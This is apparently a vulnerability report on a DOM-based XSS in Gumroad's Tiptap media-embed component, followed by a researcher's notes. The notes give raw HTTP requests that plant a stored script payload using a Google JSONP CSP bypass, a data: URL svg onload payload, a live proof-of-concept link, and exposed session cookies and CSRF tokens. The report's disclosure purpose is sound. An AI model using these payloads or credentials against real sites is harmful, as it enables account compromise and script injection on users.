Potential DOM XSS in Media Embed Feature via iframe.ly Response

Component: /app/app/javascript/components/TiptapExtensions/MediaEmbed.tsx

Vulnerability: Potential DOM-based Cross-Site Scripting (XSS) via unsanitized HTML from iframe.ly.

Source: User-controlled URL input provided to the media embed dialog (EmbedMediaForm component, triggered from the Tiptap editor menu).

Data Flow:

1. User Input: A user clicks "Insert video" or "Insert post" in the Tiptap editor and enters a URL into the EmbedMediaForm modal.
2. External API Call: The frontend takes the user's URL, encodes it, and sends it to the external iframe.ly service API: https://iframe.ly/api/oembed?iframe=1&api_key=...&url=<encoded_user_url> (See MediaEmbed.tsx:146).
3. HTML Received: The application receives a JSON response from iframe.ly. This response is expected to contain an html property (data.html) which holds the embeddable HTML code generated by iframe.ly based on the user's URL (See MediaEmbed.tsx:148-149).
4. Internal Processing: The insertMediaEmbed helper function (MediaEmbed.tsx:185) receives this data object containing data.html.
   • For certain supported providers (MEDIA_EMBED_SUPPORTING_PROVIDERS), it attempts to parse data.html and extract only the outerHTML of an <iframe> tag (MediaEmbed.tsx:187-189).
   • Fallback: If no <iframe> is found within data.html for a supported provider, it falls back to using the original data.html.
   • Unsupported Provider: If the provider is not in the supported list, it directly uses the raw data.html when calling the setRaw command (MediaEmbed.tsx:195).
5. Tiptap Command: The processed (or raw) html string is passed as an attribute to either the insertMediaEmbed Tiptap command (MediaEmbed.tsx:190) or the setRaw command (MediaEmbed.tsx:195).
6. Node Attribute Update: These commands update the Tiptap editor's state, creating/updating a mediaEmbed or raw node and storing the received HTML string in the node's attributes (node.attrs.html or HTMLAttributes.html).
7. Sink 1 (dangerouslySetInnerHTML): The ExternalMediaFileEmbed React component renders the mediaEmbed node. It uses dangerouslySetInnerHTML to render the preview, directly injecting the stored HTML: <div className="preview" dangerouslySetInnerHTML={{ __html: cast(node.attrs.html) }}></div> (MediaEmbed.tsx:246).
8. Sink 2 (innerHTML): The Raw node renderer (used if setRaw was called) also uses an innerHTML sink: doc.innerHTML = cast(HTMLAttributes.html); (MediaEmbed.tsx:67).

Risk:

The application relies on the external iframe.ly service to provide safe, embeddable HTML. If an attacker can provide a crafted URL that causes iframe.ly to return HTML containing malicious code (e.g., <script>, onerror attributes, etc.), and this HTML bypasses the simple iframe extraction logic (or uses the setRaw path), it will be stored and subsequently rendered directly into the DOM via dangerouslySetInnerHTML or innerHTML. This executes the malicious script in the context of the user's session.

Hypothetical Reproduction Steps:

(Note: Successful exploitation depends on finding a way to make iframe.ly return malicious HTML for a given URL. This might require exploiting iframe.ly itself or finding specific edge cases it handles insecurely.)

1. Navigate to a page using the rich text editor (e.g., creating/editing a product description or post).
2. Click the "Insert video" or "Insert post" button in the editor toolbar.
3. In the URL input field, enter a URL crafted to exploit iframe.ly. Examples (purely illustrative, likely blocked by iframe.ly):
   • A data: URL: data:text/html,<svg onload=alert(document.domain)>
   • A URL pointing to a page with malicious OpenGraph/oEmbed tags that iframe.ly might misinterpret.
   • Any URL for which iframe.ly is known (or discovered) to return unsanitized script content.
4. Click "Insert".
5. If the crafted URL successfully tricks iframe.ly into returning malicious HTML, and that HTML reaches the dangerouslySetInnerHTML or innerHTML sink, the script should execute.

Recommendation:

1. Avoid Direct Rendering: Do not directly render HTML received from external services using dangerouslySetInnerHTML or innerHTML, especially when the input driving the external service is user-controlled.
2. Sanitization: If rendering external HTML is unavoidable, rigorously sanitize it after receiving it from iframe.ly and before passing it to the sink. Use a well-vetted sanitization library (like DOMPurify) configured appropriately.
3. Sandboxing: Consider rendering the embed within a sandboxed <iframe> (<iframe sandbox>) to isolate it from the main application context, significantly reducing the impact of potential XSS within the embed.

[msrkp]

Good find, but it missed in first run. Cuz it only concentrated on the first bug in the same file.

PATCH /profile_sections/QCRTDCCsSE30wUXCUDHekw== HTTP/1.1
Host: seller.gumroad.dev
Cookie: _gumroad_guid=56b5abe6-fbc5-4e11-8566-9f8ccc0edaf0; _ga=GA1.1.1586563785.1744312137; __stripe_mid=d6cccb2f-4209-43da-800f-89c339fac8b5c9eb33; remember_user_token=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ilcxc3hYU3dpSkRKaEpERXhKRzh6TW1waFdVUkJOVEpNZWtNM2VuWXpXRVpNZUU4aUxDSXhOelEwTXpZM05qWTBMalF6TWpFME5DSmQiLCJleHAiOiIyMDI1LTA1LTExVDEwOjM0OjI0LjQzMloiLCJwdXIiOiJjb29raWUucmVtZW1iZXJfdXNlcl90b2tlbiJ9fQ%3D%3D--de64341ac41c159f94e7daede91d24cc48a3cb07; _ga_6LJN6D94N6=GS1.1.1744401040.7.0.1744401040.0.0.0; __profilin=p%3Dt%2Ca%3D67783b0b53311bdf17a1c0add2964df5%7C680e75fd81784e81050d840276ffa739; _mkra_stck=mysql%3A1744452650.553227; _gumroad_app_session_development=y%2Fa8eZIjLNZKwNpF1ENRNRJVqkh4v2kyIYQrfwva8i4GpU6HQbvZ%2BTo53beeH%2BmMAzkV6fWmeKUJBFdWCz%2BSVmkY8rMrq%2FdmLJUGH2pHQaq19KtQe%2BGwiJ6qwXStLwuEO2d0975dEzutywhQ%2BKdd2UayvEY6yky1zFtoiCTXcX3BH4wyypAnoZ5gyxD9YqPBchkqfxR1%2FslIu8HlphwRDYrBv0Z7%2FODMWetqm7pyjTj%2BtbasEzTMsvX7oOXI1JfofVuWj8uDWTu9x3Kj7HSl%2Fs3ftmNOAAPWoxdjhrIkLtbyFvWFDypvNMUmjZCK%2B7w6tDaf%2FqwiLLuS5SxKWh7avVjfLAGmPVCyscCu%2B3fbsfc04IbHNydAAK%2BsNSAYBhIaJKBYVfBWvgEQLVOPuCgLj8xYta3AgJzndrPe8mvWps90IOHRnOH%2BfqjT%2FSMgGTgCwTZZTLyQkTW6lTNUBcMhhzgz7BStuH9xt96iLRPg%2FxUDaNmyHKnaUaEuKVCkjmCYCdkzdIUZ0lv%2BkMpynDlL%2FUHfZuCN21eJ%2Ff309RtdXRue4GeVmiOzRCRRiSGsufqHCyqfRheiaQ2ASdHTrVMbh73Bi89Lxw%3D%3D--mJuQGZ1Of3SE3SJd--Qrxie0QbSkP8iTGVu5q%2BvA%3D%3D
Content-Length: 632
Sec-Ch-Ua-Platform: "macOS"
X-Csrf-Token: XU9ValKEjo2gvGP0QB38NV9krXkRjWTWZUO3Xfkqn3PclsbUZXSeHQOWfr9bJ9k0jXeraI24ixb22qNzJD1R4g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: application/json, text/html
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Origin: https://seller.gumroad.dev
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://seller.gumroad.dev/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i
Connection: keep-alive

{"header":"","hide_header":false,"type":"SellerProfileRichTextSection","text":{"type":"doc","content":[{"type":"raw","attrs":{"html":"<div><div style=\"left: 0; width: 100%; height: 0; position: relative; padding-bottom: 56.25%;\"></div></div><script src=\"https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1337)//\"></script>","title":"Sam Altman On Miyazaki’s thoughts on art, Design Jobs, Indian AI, Is Prompt Engineering A Job?","url":"https://www.youtube.com/watch?v=xFvlUVkMPJY","thumbnail":"https://i.ytimg.com/vi/xFvlUVkMPJY/maxresdefault.jpg"}},{"type":"paragraph"}]},"id":"QCRTDCCsSE30wUXCUDHekw=="}```

[msrkp]

wait that reaches a previous sink.

[msrkp]

POST /links/upihb HTTP/2
Host: gumroad.com
Cookie: _gumroad
Content-Length: 2289
Sec-Ch-Ua-Platform: "macOS"
X-Csrf-Token: Wj1s9jqZ_-aq1N-t62CJ4adb9nw-Cmc-ryo4Xydtm26gr8ve5Ov4ihfPErwpHIh6ZXuXsfFdkOZGfiDF-NmNZA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: application/json, text/html
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Origin: https://gumroad.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gumroad.com/products/upihb/edit/content
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,te;q=0.7
Priority: u=1, i

{"name":"asd","custom_permalink":null,"description":"<p>as</p>","price_cents":0,"customizable_price":true,"suggested_price_cents":null,"eligible_for_installment_plans":true,"allow_installment_plan":false,"installment_plan":null,"custom_button_text_option":null,"custom_summary":null,"custom_attributes":[],"file_attributes":[],"max_purchase_count":null,"quantity_enabled":false,"can_enable_quantity":true,"should_show_sales_count":false,"is_epublication":false,"product_refund_policy_enabled":false,"refund_policy":{"allowed_refund_periods_in_days":[{"key":0,"value":"No refunds allowed"},{"key":7,"value":"7-day money back guarantee"},{"key":14,"value":"14-day money back guarantee"},{"key":30,"value":"30-day money back guarantee"},{"key":183,"value":"6-month money back guarantee"}],"max_refund_period_in_days":30,"fine_print":null,"fine_print_enabled":false,"title":"30-day money back guarantee"},"covers":[],"is_published":true,"require_shipping":false,"integrations":{"circle":null,"discord":null,"zoom":null,"google_calendar":null},"variants":[],"availabilities":[],"shipping_destinations":[],"section_ids":[],"taxonomy_id":"266","tags":[],"display_product_reviews":true,"is_adult":false,"discover_fee_per_thousand":300,"custom_domain":"","free_trial_enabled":false,"free_trial_duration_amount":null,"free_trial_duration_unit":null,"should_include_last_post":false,"should_show_all_posts":false,"block_access_after_membership_cancellation":false,"duration_in_months":null,"subscription_duration":null,"collaborating_user":null,"rich_content":[{"id":"DYRSDaOriagyweVovv8Yig==","page_id":"DYRSDaOriagyweVovv8Yig==","title":null,"variant_id":null,"description":{"type":"doc","content":[{"type":"mediaEmbed","attrs":{"url":"https://www.youtube.com/watch?v=-qJatoCWZGE","html":"<script src=\"https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1337)//\"></script>","title":"Visualizing MLP learning dynamics: Centered Ring, Shape [14]*6 neurons, leaky ReLU."}},{"type":"paragraph"}]},"updated_at":"2025-04-12T10:28:55Z"}],"files":[],"has_same_rich_content_for_all_variants":true,"is_multiseat_license":false,"call_limitation_info":null,"native_type":"digital","cancellation_discount":null,"public_files":[],"audio_previews_enabled":true,"community_chat_enabled":false}```

ah this

"description":{"type":"doc","content":[{"type":"mediaEmbed","attrs":{"url":"https://www.youtube.com/watch?v=-qJatoCWZGE","html":"<script src=\"https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1337)//\"></script>","title":"Visualizing MLP learning dynamics: Centered Ring, Shape [14]*6 neurons, leaky ReLU."}},{"type":"paragraph"}]},

[msrkp]

PoC:
https://gumroad.com/d/f9a7d53246cf5efb0c784f83cf81e97c

enter: a@a.com